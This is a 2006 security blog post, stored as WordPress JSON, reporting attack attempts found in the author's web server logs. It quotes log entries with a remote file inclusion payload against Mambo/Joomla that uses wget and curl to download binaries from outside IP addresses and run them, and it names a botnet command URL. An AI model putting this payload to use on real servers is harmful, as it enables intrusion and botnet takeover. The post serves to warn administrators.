{"id":44,"date":"2006-05-05T11:06:15","date_gmt":"2006-05-05T15:06:15","guid":{"rendered":"http:\/\/blogs.law.harvard.edu\/zeroday\/2006\/05\/05\/interesting-attacks-on-my-web-server\/"},"modified":"2006-05-08T09:52:51","modified_gmt":"2006-05-08T13:52:51","slug":"interesting-attacks-on-my-web-server","status":"publish","type":"post","link":"https:\/\/archive.blogs.harvard.edu\/zeroday\/2006\/05\/05\/interesting-attacks-on-my-web-server\/","title":{"rendered":"Interesting attacks on my web server"},"content":{"rendered":"<p><a name=\"a59\"><\/a><\/p>\n<p>Still think that firewall is enough to protect your web server?  Port 80 to the rescue!<br \/>\nThrough a combination of curl, wget and various shell commands this &#8220;URL&#8221; is a sneaky little rootkit.  I haven&#8217;t had time to download the executables and rip them apart but something tells me that after all is said and done&#8230; you end up on some IRC server in Brazil.  Call it a hunch.<\/p>\n<p>130.227.55.243 &#8211; &#8211; [25\/Apr\/2006:10:08:10 -0700] &#8220;GET \/index2.php?option=com_content&amp;do_pdf=1&amp;id=1index2.php?_REQUEST[option]=com_content&amp;_REQUEST[Itemid]=1&amp;GLOBALS=&amp;mosConfig_absolute_path=http:\/\/210.3.4.193\/cmd.txt?&amp;cmd=cd%20\/tmp;wget%2070.168.74.193\/strange;chmod%20744%20strange;.\/strange;cd%20\/var\/tmp;curl%20-o%20arts%20http:\/\/207.90.211.54\/arts;chmod%20744%20arts;.\/arts;echo%20YYY;echo|  HTTP\/1.1&#8221; 404 1044 &#8220;-&#8221; &#8220;Mozilla\/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)&#8221;130.227.55.243 &#8211; &#8211; [25\/Apr\/2006:10:08:11 -0700] &#8220;GET \/index.php?option=com_content&amp;do_pdf=1&amp;id=1index2.php?_REQUEST[option]=com_content&amp;_REQUEST[Itemid]=1&amp;GLOBALS=&amp;mosConfig_absolute_path=http:\/\/210.3.4.193\/cmd.txt?&amp;cmd=cd%20\/tmp;wget%2070.168.74.193\/strange;chmod%20744%20strange;.\/strange;cd%20\/var\/tmp;curl%20-o%20arts%20http:\/\/207.90.211.54\/arts;chmod%20744%20arts;.\/arts;echo%20YYY;echo|  HTTP\/1.1&#8221; 404 1044 &#8220;-&#8221; &#8220;Mozilla\/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)&#8221;130.227.55.243 &#8211; &#8211; [25\/Apr\/2006:10:08:12 -0700] &#8220;GET \/mambo\/index2.php?_REQUEST[option]=com_content&amp;_REQUEST[Itemid]=1&amp;GLOBALS=&amp;mosConfig_absolute_path=http:\/\/210.3.4.193\/cmd.txt?&amp;cmd=cd%20\/tmp;wget%2070.168.74.193\/strange;chmod%20744%20strange;.\/strange;cd%20\/var\/tmp;curl%20-o%20arts%20http:\/\/207.90.211.54\/arts;chmod%20744%20arts;.\/arts;echo%20YYY;echo|  HTTP\/1.1&#8221; 404 1044 &#8220;-&#8221; &#8220;Mozilla\/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)&#8221;<\/p>\n<p>Seclists.org also noticed this traffic back in March.<br \/>\n<a href=\"http:\/\/seclists.org\/lists\/fulldisclosure\/2006\/Mar\/0176.html\">All of them, as we can see, are exploitation attempts to known bugged<br \/>\npages (like the newest Mambo bug, the old XMLRPC problem with old<br \/>\nversions of Drupal, etc). I guess that they are getting a list of<br \/>\ndomain names and trying them out with those vulns, and I believe that<br \/>\nthey may already have some thousands of vuln machines in their hands.<br \/>\nSuch attacks might been enhanced by using Google to guess which<br \/>\ndomains are using which CMS&#8230; for example, looking on Google for &#8220;A<br \/>\npassword and instructions will be sent to this e-mail address, so make<br \/>\nsure it is accurate.&#8221; will return a bunch of Drupal websites (88,500<br \/>\naccording to Google, even though we can see just the first 1000 ones). <\/p>\n<p>This is just an advise for all admins that use those CMS, to keep, as<br \/>\nalways, your CMS updated (almost every two weeks there are new vulns<br \/>\ndisclosed), and also, check if you already got caught by that, if<br \/>\nyou&#8217;re running old software. <\/p>\n<p><\/a><\/p>\n<p>The most interesting comment here is the use of Google to hone the attacks.  There is even a book on the market that talks about hacking with google.  One of the more novel methods was extracting credit card numbers.  Before anyone wonders <a href=\"http:\/\/news.com.com\/Suit+accuses+Google+of+profiting+from+child+porn\/2100-1030_3-6069014.html\">whether Google gets sued <\/a> over the random crimes committed by others using Google look no further.<\/p>\n<p>More details found on a forum regarding the make up of this root kit:<br \/>\n<a href=\"http:\/\/www.mail-archive.com\/botnets@whitestar.linuxbox.org\/msg00334.html\"><\/p>\n<pre>\r\n another botnet irc client:\r\n http:\/\/210.3.4.193\/cmd.txt  \r\n<\/pre>\n<p><\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Still think that firewall is enough to protect your web server? Port 80 to the rescue! Through a combination of curl, wget and various shell commands this &#8220;URL&#8221; is a sneaky little rootkit. I haven&#8217;t had time to download the executables and rip them apart but something tells me that after all is said and [&hellip;]<\/p>\n","protected":false},"author":214,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[275],"tags":[],"class_list":["post-44","post","type-post","status-publish","format-standard","hentry","category-vulnerabilities"],"jetpack_featured_media_url":"","_links":{"self":[{"href":"https:\/\/archive.blogs.harvard.edu\/zeroday\/wp-json\/wp\/v2\/posts\/44","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/archive.blogs.harvard.edu\/zeroday\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/archive.blogs.harvard.edu\/zeroday\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/archive.blogs.harvard.edu\/zeroday\/wp-json\/wp\/v2\/users\/214"}],"replies":[{"embeddable":true,"href":"https:\/\/archive.blogs.harvard.edu\/zeroday\/wp-json\/wp\/v2\/comments?post=44"}],"version-history":[{"count":0,"href":"https:\/\/archive.blogs.harvard.edu\/zeroday\/wp-json\/wp\/v2\/posts\/44\/revisions"}],"wp:attachment":[{"href":"https:\/\/archive.blogs.harvard.edu\/zeroday\/wp-json\/wp\/v2\/media?parent=44"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/archive.blogs.harvard.edu\/zeroday\/wp-json\/wp\/v2\/categories?post=44"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/archive.blogs.harvard.edu\/zeroday\/wp-json\/wp\/v2\/tags?post=44"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}